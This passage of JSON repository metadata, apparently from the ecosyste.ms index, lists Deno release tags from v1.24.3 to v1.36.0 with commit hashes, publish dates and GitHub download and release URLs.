nd":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/